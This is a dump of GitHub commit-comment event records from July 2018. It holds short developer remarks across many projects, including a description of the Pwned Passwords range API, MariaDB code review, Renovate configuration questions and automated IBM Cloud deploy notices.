{"id":"7912832614","type":"CommitCommentEvent","actor":{"login":"abemby"},"repo":{"name":"abemby/PawnedPasswordChecker"},"payload":{"comment":{"id":29581598,"position":null,"line":null,"path":null,"commit_id":"4fd29a45084d61aab4c62f9f343a3e8c3c64f59a","created_at":"2018-07-03T14:10:21Z","updated_at":"2018-07-03T14:10:21Z","author_association":"OWNER","body":"Searching by range\r\nIn order to protect the value of the source password being searched for, Pwned Passwords also implements a k-Anonymity model that allows a password to be searched for by partial hash. This allows the first 5 characters of a SHA-1 password hash (not case-sensitive) to be passed to the API (testable by clicking here):\r\n\r\nGET https://api.pwnedpasswords.com/range/{first 5 hash chars}\r\n\r\nWhen a password hash with the same first 5 characters is found in the Pwned Passwords repository, the API will respond with an HTTP 200 and include the suffix of every hash beginning with the specified prefix, followed by a count of how many times it appears in the data set. The API consumer can then search the results of the response for the presence of their source hash and if not found, the password does not exist in the data set. A sample response for the hash prefix \"21BD1\" would be as follows:\r\n\r\n0018A45C4D1DEF81644B54AB7F969B88D65:1\r\n00D4F6E8FA6EECAD2A3AA415EEC418D38EC:2\r\n011053FD0102E94D6AE2F8B83D76FAF94F6:1\r\n012A7CA357541F0AC487871FEEC1891C49C:2\r\n0136E006E24E7D152139815FB0FC6A50B15:2\r\n...\r\n\r\nOn average, a range search returns 478 hash suffixes, although this number will differ depending on the hash prefix being searched for. The smallest result is 381, the largest 584. There are 1,048,576 different hash prefixes between 00000 and FFFFF (16^5) and every single one will return HTTP 200; there is no circumstance in which the API should return HTTP 404.\r\n"}},"created_at":"2018-07-03T14:10:21Z"}
{"id":"7912835251","type":"CommitCommentEvent","actor":{"login":"snopoke"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29581604,"position":null,"line":null,"path":null,"commit_id":"3725fc0f3405fb0de0e1c5618e8367495df9b6bf","created_at":"2018-07-03T14:10:45Z","updated_at":"2018-07-03T14:10:45Z","author_association":"CONTRIBUTOR","body":"You can do this which will prevent the task from even registering in Celery: https://github.com/dimagi/commcare-hq/blob/00756ab5947ba6071abce0b3522dea4d2c4a6b80/custom/icds/tasks.py#L19"}},"created_at":"2018-07-03T14:10:45Z"}
{"id":"7912835717","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"rougier/freetype-py"},"payload":{"comment":{"id":29581607,"position":4,"line":84,"path":".travis.yml","commit_id":"4ca90e3831813eb361f0b4a17430351c40655886","created_at":"2018-07-03T14:10:50Z","updated_at":"2018-07-03T14:10:50Z","author_association":"CONTRIBUTOR","body":"that was the whole point of that dummy \"check\" setuptools command just a few lines below."}},"created_at":"2018-07-03T14:10:50Z"}
{"id":"7912845176","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/GeoNature"},"payload":{"comment":{"id":29581623,"position":null,"line":null,"path":null,"commit_id":"6bd30d261c313576d36325d4c5f585fafef90739","created_at":"2018-07-03T14:12:20Z","updated_at":"2018-07-03T14:12:20Z","author_association":"MEMBER","body":"Top ! "}},"created_at":"2018-07-03T14:12:20Z"}
{"id":"7912849290","type":"CommitCommentEvent","actor":{"login":"vivekkr"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29581633,"position":104,"line":162,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-03T14:12:58Z","updated_at":"2018-07-03T14:12:58Z","author_association":"CONTRIBUTOR","body":"Added 'IS_MIXED' and added the description to make it more clear"}},"created_at":"2018-07-03T14:12:58Z"}
{"id":"7912853778","type":"CommitCommentEvent","actor":{"login":"Hartorn"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29581649,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T14:13:39Z","updated_at":"2018-07-03T14:13:39Z","author_association":"CONTRIBUTOR","body":"Renovate is an awesome tools btw, congrats!\nI will see how I change the version "}},"created_at":"2018-07-03T14:13:39Z"}
{"id":"7912854066","type":"CommitCommentEvent","actor":{"login":"vivekkr"},"repo":{"name":"UKHomeOffice/booktravel_schema"},"payload":{"comment":{"id":29581651,"position":189,"line":202,"path":"travel-provider/TSP-40-SubmitTicketDetails/TSP-40-SubmitTicketDetails-Request.schema.json","commit_id":"17a13af69a8b293b88107ec1f2edf9227e259af2","created_at":"2018-07-03T14:13:41Z","updated_at":"2018-07-03T14:13:41Z","author_association":"CONTRIBUTOR","body":"Yes. Changed it to a Number. Will add the validation later so that it doesn't allow beyond 2 places of decimal"}},"created_at":"2018-07-03T14:13:41Z"}
{"id":"7912865904","type":"CommitCommentEvent","actor":{"login":"minrk"},"repo":{"name":"jupyterhub/kubespawner"},"payload":{"comment":{"id":29581676,"position":5,"line":1375,"path":"kubespawner/spawner.py","commit_id":"82e69f5676927b4a07fa642d9c9f99508849900c","created_at":"2018-07-03T14:15:28Z","updated_at":"2018-07-03T14:15:28Z","author_association":"MEMBER","body":"Thanks, fixed in #201"}},"created_at":"2018-07-03T14:15:28Z"}
{"id":"7912873004","type":"CommitCommentEvent","actor":{"login":"Hartorn"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29581689,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T14:16:34Z","updated_at":"2018-07-03T14:16:34Z","author_association":"CONTRIBUTOR","body":"@rarkins another thing, I had an issue with semantic type option, for the prefix.\n\nI wanted to have chore for minor and patch, and feat for major, but I could not make it work with my config(current one). Any idea? "}},"created_at":"2018-07-03T14:16:34Z"}
{"id":"7912876714","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29581695,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-03T14:17:07Z","updated_at":"2018-07-03T14:17:07Z","author_association":"MEMBER","body":"@drdanz @damn1 are there other cases where exit codes are simply a cast from bool (which is wrong)?"}},"created_at":"2018-07-03T14:17:07Z"}
{"id":"7912886656","type":"CommitCommentEvent","actor":{"login":"rarkins"},"repo":{"name":"thc-tools/webpack-react"},"payload":{"comment":{"id":29581724,"position":null,"line":null,"path":null,"commit_id":"016850836a0e3f1d1e30f8cfc09cd9ebe6ec11ab","created_at":"2018-07-03T14:18:40Z","updated_at":"2018-07-03T14:18:40Z","author_association":"NONE","body":"@Hartorn please post your question to https://github.com/renovatebot/config-help/issues/new and I'll help you there. "}},"created_at":"2018-07-03T14:18:40Z"}
{"id":"7912894526","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29581736,"position":51,"line":50,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T14:19:53Z","updated_at":"2018-07-03T14:19:53Z","author_association":"NONE","body":"For readability, these `&&` expressions can be written as separate `require()`. "}},"created_at":"2018-07-03T14:19:53Z"}
{"id":"7912897774","type":"CommitCommentEvent","actor":{"login":"babydux"},"repo":{"name":"xd1936/inout2"},"payload":{"comment":{"id":29581742,"position":null,"line":null,"path":null,"commit_id":"f3230ad7e7e6cb4f28d514a7ef499bdd5f45674c","created_at":"2018-07-03T14:20:23Z","updated_at":"2018-07-03T14:20:23Z","author_association":"NONE","body":"I would like to try your code, where do you display the html file or see the output?"}},"created_at":"2018-07-03T14:20:23Z"}
{"id":"7912898793","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29581749,"position":58,"line":54,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-03T14:20:34Z","updated_at":"2018-07-03T14:20:34Z","author_association":"NONE","body":"Did you try `now + dayClaim days`?"}},"created_at":"2018-07-03T14:20:34Z"}
{"id":"7912906989","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29581766,"position":null,"line":null,"path":null,"commit_id":"787aba62f55bdb3cf59ba8f673aed10462e18578","created_at":"2018-07-03T14:21:52Z","updated_at":"2018-07-03T14:21:52Z","author_association":"CONTRIBUTOR","body":"Added accessibility."}},"created_at":"2018-07-03T14:21:52Z"}
{"id":"7912907503","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581767,"position":112,"line":21712,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T14:21:57Z","updated_at":"2018-07-03T14:21:57Z","author_association":"CONTRIBUTOR","body":"We do not seem to need the variable `mysql_table` here. Previously, we would not `return` NULL here, but now we can do that. Maybe a comment should be added to explain when the NULL value is possible.\r\n\r\nIt would also be nice to have a comment that explains where dict_operation_lock` would have been acquired.\r\n\r\nCan `bg_thread` be renamed to `purge_thread`? Or does it hold for anything else than purge threads? Can you add a comment that explains where `background_thread` is set on `thd`?"}},"created_at":"2018-07-03T14:21:57Z"}
{"id":"7912910176","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"bubasik/cpuminer-opt-yespower"},"payload":{"comment":{"id":29581781,"position":null,"line":null,"path":null,"commit_id":"2326d9168da61092353b0f7bd1dd8ea119574c21","created_at":"2018-07-03T14:22:21Z","updated_at":"2018-07-03T14:22:21Z","author_association":"NONE","body":"FYI, the rename of SHA-256 file and functions should be totally unnecessary for yespower, with the problem having been worked around differently with the #define's in its sha256.h.\r\n\r\nAlso, you should be able to drop the old yescrypt from the tree, by invoking yespower with .version = YESPOWER_0_5 instead. This should provide a few percent speedup for those coins that still use yescrypt 0.5."}},"created_at":"2018-07-03T14:22:21Z"}
{"id":"7912912609","type":"CommitCommentEvent","actor":{"login":"mschilli87"},"repo":{"name":"qutebrowser/qutebrowser"},"payload":{"comment":{"id":29581784,"position":null,"line":null,"path":null,"commit_id":"0f037fb415581283074dff8b2d090cefcd337602","created_at":"2018-07-03T14:22:43Z","updated_at":"2018-07-03T14:22:43Z","author_association":"CONTRIBUTOR","body":"corresponding Gentoo version bump request: https://bugs.gentoo.org/660034"}},"created_at":"2018-07-03T14:22:43Z"}
{"id":"7912913088","type":"CommitCommentEvent","actor":{"login":"jnifir"},"repo":{"name":"jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590"},"payload":{"comment":{"id":29581789,"position":null,"line":null,"path":null,"commit_id":"effff35700a1ca9a18c6ceb8852e908569bb07ef","created_at":"2018-07-03T14:22:48Z","updated_at":"2018-07-03T14:22:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/31b2156f-c5d9-4c6e-b219-f21ce41469d1?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703135929590\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bb33ba73-a7ad-4885-95ea-6f8aca4921f1?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703135929590\") deployed [sample-cloud-native-toolchain-tutorial-20180703135929590](https://github.com/jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590/releases/tag/deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-test-20180703-142245 \"deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-test-20180703-142245\") to [test](https://console.bluemix.net/apps/2a6cebac-cedf-4eea-94b7-0c6939816108?env_id=ibm:yp:us-south \"ibm:yp:us-south:jennifer_wales@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-03T14:22:48Z"}
{"id":"7912918712","type":"CommitCommentEvent","actor":{"login":"lionelgo"},"repo":{"name":"OPENAIRINTERFACE/openair-cn"},"payload":{"comment":{"id":29581803,"position":null,"line":null,"path":null,"commit_id":"d862c3783f64ed0d182efe67faace4d282440b43","created_at":"2018-07-03T14:23:40Z","updated_at":"2018-07-03T14:23:40Z","author_association":"CONTRIBUTOR","body":"Update impact only SPGW, Dincer commits on GTPV2-C are available for MME without modifications"}},"created_at":"2018-07-03T14:23:40Z"}
{"id":"7912919956","type":"CommitCommentEvent","actor":{"login":"wooriapt79"},"repo":{"name":"wooriapt/Policies-Agreements"},"payload":{"comment":{"id":29581806,"position":1,"line":1,"path":"Purchase Agreement","commit_id":"ddd1757de93c75a481dae85bca7117257778f57e","created_at":"2018-07-03T14:23:51Z","updated_at":"2018-07-03T14:23:51Z","author_association":"CONTRIBUTOR","body":"Purchase Agreement\r\nLast updated: June 1, 2018\r\n"}},"created_at":"2018-07-03T14:23:51Z"}
{"id":"7912921178","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29581809,"position":null,"line":null,"path":null,"commit_id":"97e51f6ba3fba3f18be0769d45a9ba930c50b5db","created_at":"2018-07-03T14:24:03Z","updated_at":"2018-07-03T14:24:03Z","author_association":"MEMBER","body":"@alium \r\n\r\nExcellent, in case you wonder later, do yourself a favor and don't start adding haskell depends for some pytest. ;)\r\nI can give you quick intro for replaying a given commit if it failed due to gpg or sig problems, instead of pushing new."}},"created_at":"2018-07-03T14:24:03Z"}
{"id":"7912924767","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581811,"position":4,"line":50,"path":"storage/innobase/include/dict0dict.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T14:24:37Z","updated_at":"2018-07-03T14:24:37Z","author_association":"CONTRIBUTOR","body":"We do not seem to really need anything from `mdl.h` in this file. The definition of `NAME_LEN` should already be pulled from an existing `#include`. Please do not pollute `.h` files with unnecessary `#include`. Add it to the relevant `.cc` files instead."}},"created_at":"2018-07-03T14:24:37Z"}
{"id":"7912926524","type":"CommitCommentEvent","actor":{"login":"qwwdfsad"},"repo":{"name":"Kotlin/kotlinx.coroutines"},"payload":{"comment":{"id":29581816,"position":28,"line":28,"path":"core/kotlinx-coroutines-core/src/main/kotlin/kotlinx/coroutines/experimental/actors/MonoActor.kt","commit_id":"744be7facab6d6f339778a371954f95d10ceeeda","created_at":"2018-07-03T14:24:53Z","updated_at":"2018-07-03T14:24:53Z","author_association":"MEMBER","body":"You're right, I will revisit naming"}},"created_at":"2018-07-03T14:24:53Z"}
{"id":"7912927128","type":"CommitCommentEvent","actor":{"login":"cdcharlebois"},"repo":{"name":"cdcharlebois/ExitIntent"},"payload":{"comment":{"id":29581817,"position":49,"line":55,"path":"src/ExitIntent/widget/ExitIntent.js","commit_id":"c52bfe7ea7fb0ab42df541f307b412776333c27a","created_at":"2018-07-03T14:24:58Z","updated_at":"2018-07-03T14:24:58Z","author_association":"OWNER","body":"`window.mx.router` is no longer an object. The handling for page navigation is now handled by the `mx.ui` object"}},"created_at":"2018-07-03T14:24:58Z"}
{"id":"7912929973","type":"CommitCommentEvent","actor":{"login":"jnifir"},"repo":{"name":"jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590"},"payload":{"comment":{"id":29581824,"position":null,"line":null,"path":null,"commit_id":"effff35700a1ca9a18c6ceb8852e908569bb07ef","created_at":"2018-07-03T14:25:25Z","updated_at":"2018-07-03T14:25:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/31b2156f-c5d9-4c6e-b219-f21ce41469d1?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180703135929590\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bb33ba73-a7ad-4885-95ea-6f8aca4921f1?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180703135929590\") deployed [sample-cloud-native-toolchain-tutorial-20180703135929590](https://github.com/jnifir/sample-cloud-native-toolchain-tutorial-20180703135929590/releases/tag/deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180703-142524 \"deploy-ibm-yp-us-south-jennifer_wales-us.ibm.com-prod-20180703-142524\") to [prod](https://console.bluemix.net/apps/d0af2a03-a98d-4eae-9c59-424cc9bf4543?env_id=ibm:yp:us-south \"ibm:yp:us-south:jennifer_wales@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-03T14:25:25Z"}
{"id":"7912950083","type":"CommitCommentEvent","actor":{"login":"AVoskoboinikov"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":29581912,"position":5,"line":309,"path":"app/code/Magento/CatalogInventory/Model/ResourceModel/Indexer/Stock/DefaultStock.php","commit_id":"622008ce3eb0f197fc97de5aa69e9ce1fd4db5e3","created_at":"2018-07-03T14:28:24Z","updated_at":"2018-07-03T14:28:24Z","author_association":"CONTRIBUTOR","body":"Hi @synolia-bvo this is know issue and fix is [here](https://github.com/magento/magento2/pull/13852/files)"}},"created_at":"2018-07-03T14:28:24Z"}
{"id":"7912954517","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"macycumapy/yii2_lesson"},"payload":{"comment":{"id":29581930,"position":57,"line":57,"path":"models/Calendar.php","commit_id":"2a519f3afcb9b21fcae8b653997303d5fc15f1e4","created_at":"2018-07-03T14:29:02Z","updated_at":"2018-07-03T14:29:02Z","author_association":"NONE","body":"creator0 не очень хорошее название для аттрибута связи. creatorModel как минимум)"}},"created_at":"2018-07-03T14:29:02Z"}
{"id":"7912956589","type":"CommitCommentEvent","actor":{"login":"Ardethian"},"repo":{"name":"kolzchut/mediawiki-extensions-Discovery"},"payload":{"comment":{"id":29581942,"position":null,"line":null,"path":null,"commit_id":"c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9","created_at":"2018-07-03T14:29:19Z","updated_at":"2018-07-03T14:29:19Z","author_association":"COLLABORATOR","body":"Currently waiting for new SVG icons from Moshe; the current ones are black and we need blue."}},"created_at":"2018-07-03T14:29:19Z"}
{"id":"7912958843","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29581952,"position":6,"line":418,"path":"src/main/java/org/owasp/esapi/reference/FileBasedAuthenticator.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-03T14:29:39Z","updated_at":"2018-07-03T14:29:39Z","author_association":"OWNER","body":"In testing I couldn't recreate the '.esapi' directory.  The escape was causing the '.' to be ignored and I was creating a user.home/esapi/... directory that didn't match runtime expectations.\r\n\r\nI question this change, I don't really understand why I needed this."}},"created_at":"2018-07-03T14:29:39Z"}
{"id":"7912963628","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29581970,"position":16,"line":88,"path":"src/test/java/org/owasp/esapi/reference/AuthenticatorTest.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-03T14:30:24Z","updated_at":"2018-07-03T14:30:24Z","author_association":"OWNER","body":"More confusing now.  Why did this do anything if my directories won't match?"}},"created_at":"2018-07-03T14:30:24Z"}
{"id":"7912966370","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581976,"position":43,"line":900,"path":"storage/innobase/include/row0mysql.h","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T14:30:48Z","updated_at":"2018-07-03T14:30:48Z","author_association":"CONTRIBUTOR","body":"All these member functions should be declared `const`. I think that `== true` is redundant and should be removed."}},"created_at":"2018-07-03T14:30:48Z"}
{"id":"7912971002","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29581987,"position":34,"line":633,"path":"src/test/java/org/owasp/esapi/reference/AuthenticatorTest.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-03T14:31:29Z","updated_at":"2018-07-03T14:31:29Z","author_association":"OWNER","body":"This content is dependent on cross-test impacts.  IMO this is bad practice.  In addition, it fails when the test clears the file context.\r\n"}},"created_at":"2018-07-03T14:31:29Z"}
{"id":"7912971537","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29581991,"position":215,"line":215,"path":"src/main/java/org/digitalmediaserver/crowdin/tool/CrowdinFileSystem.java","commit_id":"4b280c79c6041d5b152ffdb6aa06d0cac9f293b8","created_at":"2018-07-03T14:31:34Z","updated_at":"2018-07-03T14:31:34Z","author_association":"NONE","body":"You didn't write `if (StringUtils.isBlank(items)) {` because `org.apache.commons.lang3.StringUtils` has not been imported, is that correct?"}},"created_at":"2018-07-03T14:31:34Z"}
{"id":"7912973279","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29581997,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T14:31:50Z","updated_at":"2018-07-03T14:31:50Z","author_association":"NONE","body":"Would you be willing reevaluating sentry on this list? We’re not a traditional analytics provider nor are we advertising. Our Sdk is used to capture errors so developers can correct problems in their JavaScript code. It’s very very different from tracking code as we simply don’t do any of that. "}},"created_at":"2018-07-03T14:31:50Z"}
{"id":"7912979404","type":"CommitCommentEvent","actor":{"login":"barbudreadmon"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29582018,"position":null,"line":null,"path":null,"commit_id":"55b25a4208c453bb5b28cdce634d464c25fb646f","created_at":"2018-07-03T14:32:47Z","updated_at":"2018-07-03T14:32:47Z","author_association":"NONE","body":"For what it's worth, GG XX and Akatsuki seems to be wired the same way as DOA2 and MVSC2 in MAME naomi, so that's probably not the issue here."}},"created_at":"2018-07-03T14:32:47Z"}
{"id":"7912981182","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29582027,"position":5,"line":17,"path":"composer.json","commit_id":"e9c41df845fce157b02ecf993a041563aeb7c8c3","created_at":"2018-07-03T14:33:05Z","updated_at":"2018-07-03T14:33:05Z","author_association":"NONE","body":"ее! это то, что нужно) Долой старый php! =)"}},"created_at":"2018-07-03T14:33:05Z"}
{"id":"7912983950","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29582034,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T14:33:31Z","updated_at":"2018-07-03T14:33:31Z","author_association":"NONE","body":"This is awesome. Compiling fine! Great job"}},"created_at":"2018-07-03T14:33:31Z"}
{"id":"7912986361","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/crowdin-maven-plugin"},"payload":{"comment":{"id":29582045,"position":215,"line":215,"path":"src/main/java/org/digitalmediaserver/crowdin/tool/CrowdinFileSystem.java","commit_id":"4b280c79c6041d5b152ffdb6aa06d0cac9f293b8","created_at":"2018-07-03T14:33:54Z","updated_at":"2018-07-03T14:33:54Z","author_association":"CONTRIBUTOR","body":"@Sami32 Yes, I made my own isBlank() function because I didn't want to have to depend on commons.lang3 just for that small function."}},"created_at":"2018-07-03T14:33:54Z"}
{"id":"7912986460","type":"CommitCommentEvent","actor":{"login":"RickKimball"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29582046,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T14:33:55Z","updated_at":"2018-07-03T14:33:55Z","author_association":"CONTRIBUTOR","body":"This discussion is all bogus. \r\n\r\n1.) This pull has already been integrated like 3 years ago why are we talking about it? delay() works properly.  If you don't think it does, provide some test code and logic analyzer output that shows it is broken.\r\n\r\n2.) micros() is based on cycle counting code which is indeterminate when used by mcus like the cortex-m3 or m4 that have pipelines. \r\n\r\n3.) calling delay(0) when using multi-tasking provides a way to yield() without calling yield(). If you short cut the delay function it will never yield.\r\n"}},"created_at":"2018-07-03T14:33:55Z"}
{"id":"7912991813","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"celebron/geek"},"payload":{"comment":{"id":29582072,"position":6,"line":22,"path":"composer.json","commit_id":"524a674eeacfe8a3516af7811bd5bd2337b3fa39","created_at":"2018-07-03T14:34:44Z","updated_at":"2018-07-03T14:34:44Z","author_association":"NONE","body":"Старайся указывать более четкие версии. Конструкция * когда-нибудь сломает проект. Причем в самый неподходящий момент))"}},"created_at":"2018-07-03T14:34:44Z"}
{"id":"7912996994","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29582093,"position":null,"line":null,"path":null,"commit_id":"97e51f6ba3fba3f18be0769d45a9ba930c50b5db","created_at":"2018-07-03T14:35:31Z","updated_at":"2018-07-03T14:35:31Z","author_association":"CONTRIBUTOR","body":"yes please :-) i need quick intro about  gpg or sig problems, it is a nightmare for me :-D"}},"created_at":"2018-07-03T14:35:31Z"}
{"id":"7912997587","type":"CommitCommentEvent","actor":{"login":"0xc0170"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":29582095,"position":169,"line":919,"path":"features/lorawan/lorastack/mac/LoRaMac.cpp","commit_id":"828815c7e333514e289e19d50f0069496da2f03a","created_at":"2018-07-03T14:35:37Z","updated_at":"2018-07-03T14:35:37Z","author_association":"MEMBER","body":"@hasnainvirk all good with this warning?"}},"created_at":"2018-07-03T14:35:37Z"}
{"id":"7912997775","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"Abisele90/pixelArtMaker"},"payload":{"comment":{"id":29582096,"position":null,"line":null,"path":null,"commit_id":"eda558655c6cedae7726ecb4512e8986a4442379","created_at":"2018-07-03T14:35:39Z","updated_at":"2018-07-03T14:35:39Z","author_association":"NONE","body":"You did a great job with version control, so i'd love to drop this.. Always include meaningful commit messages. `Update README.md` is not really good enough commit message. But really, You did an awesome job!"}},"created_at":"2018-07-03T14:35:39Z"}
{"id":"7913008296","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29582126,"position":null,"line":null,"path":null,"commit_id":"97e51f6ba3fba3f18be0769d45a9ba930c50b5db","created_at":"2018-07-03T14:37:14Z","updated_at":"2018-07-03T14:37:14Z","author_association":"MEMBER","body":"Irc?\r\n"}},"created_at":"2018-07-03T14:37:14Z"}
{"id":"7913009646","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29582131,"position":null,"line":null,"path":null,"commit_id":"97e51f6ba3fba3f18be0769d45a9ba930c50b5db","created_at":"2018-07-03T14:37:26Z","updated_at":"2018-07-03T14:37:26Z","author_association":"CONTRIBUTOR","body":"I've already seen haskell depends, but I do not even have a bit of a taste to add them :-D"}},"created_at":"2018-07-03T14:37:26Z"}
{"id":"7913010693","type":"CommitCommentEvent","actor":{"login":"netskopegittest1"},"repo":{"name":"Scaleskope-Ind/Org_Apic_Auto_Repo"},"payload":{"comment":{"id":29582135,"position":1,"line":1,"path":"new_test_1530628642.txt","commit_id":"6b67a388a9d3374cbff42eeb1eacdeb7793a8202","created_at":"2018-07-03T14:37:36Z","updated_at":"2018-07-03T14:37:36Z","author_association":"NONE","body":"Needs to be change this!!!"}},"created_at":"2018-07-03T14:37:36Z"}
{"id":"7913012045","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29582140,"position":null,"line":null,"path":null,"commit_id":"97e51f6ba3fba3f18be0769d45a9ba930c50b5db","created_at":"2018-07-03T14:37:50Z","updated_at":"2018-07-03T14:37:50Z","author_association":"CONTRIBUTOR","body":"Irc? yes"}},"created_at":"2018-07-03T14:37:50Z"}
{"id":"7913016093","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29582149,"position":6,"line":418,"path":"src/main/java/org/owasp/esapi/reference/FileBasedAuthenticator.java","commit_id":"5801fcbd6d1eab370e9c9030e82ab92497e2dc4e","created_at":"2018-07-03T14:38:29Z","updated_at":"2018-07-03T14:38:29Z","author_association":"OWNER","body":"I misread the implementation.  The intention is not to escape the '.'  It's the filesystem separator.  I feel better about this change now.  Using the Java API to nest directories means we don't need to hard-code path constructions in strings."}},"created_at":"2018-07-03T14:38:29Z"}
{"id":"7913025453","type":"CommitCommentEvent","actor":{"login":"mlsteele"},"repo":{"name":"keybase/client"},"payload":{"comment":{"id":29582162,"position":14,"line":178,"path":"protocol/avdl/stellar1/remote.avdl","commit_id":"6deed5a511820db918787caf2367e1af1709f53e","created_at":"2018-07-03T14:39:58Z","updated_at":"2018-07-03T14:39:58Z","author_association":"CONTRIBUTOR","body":"https://zpl.io/2y7qy8n Seems like when a user requests $34 it's up to the fulfiller to do the conversion later. So then the request would have one or the other but not both."}},"created_at":"2018-07-03T14:39:58Z"}
